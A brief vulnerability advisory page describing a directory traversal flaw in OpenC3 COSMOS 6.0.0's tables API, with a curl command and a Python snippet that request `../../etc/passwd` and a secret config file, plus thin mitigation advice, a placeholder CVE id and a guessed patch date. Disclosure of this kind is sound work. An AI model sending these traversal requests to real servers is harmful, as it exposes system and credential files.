Listen to this Post
The CVE-2025-XXXX vulnerability in OpenC3 COSMOS 6.0.0 arises from insufficient input validation in the `openc3-api/tables` endpoint. Attackers can manipulate file path parameters using `../` sequences to traverse directories, accessing arbitrary files outside the intended scope. This occurs due to a lack of sanitization in user-supplied input before processing file operations. The API fails to enforce proper path restrictions, allowing unauthorized read access to sensitive system files. Exploitation requires a malicious HTTP request containing crafted path traversal sequences.
DailyCVE Form:
Platform: OpenC3 COSMOS
Version: 6.0.0
Vulnerability: Directory Traversal
Severity: High
Date: Jun 16, 2025
Prediction: Patch expected by Jul 10, 2025
What Undercode Say:
curl -X GET 'http://target/openc3-api/tables?file=../../etc/passwd'
import requests
response = requests.get('http://target/openc3-api/tables', params={'file': '../../secret.conf'})
How Exploit:
Craft HTTP requests with `../` sequences to access restricted files.
Protection from this CVE:
Update to patched version. Sanitize user input.
Impact:
Unauthorized file disclosure, system compromise.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
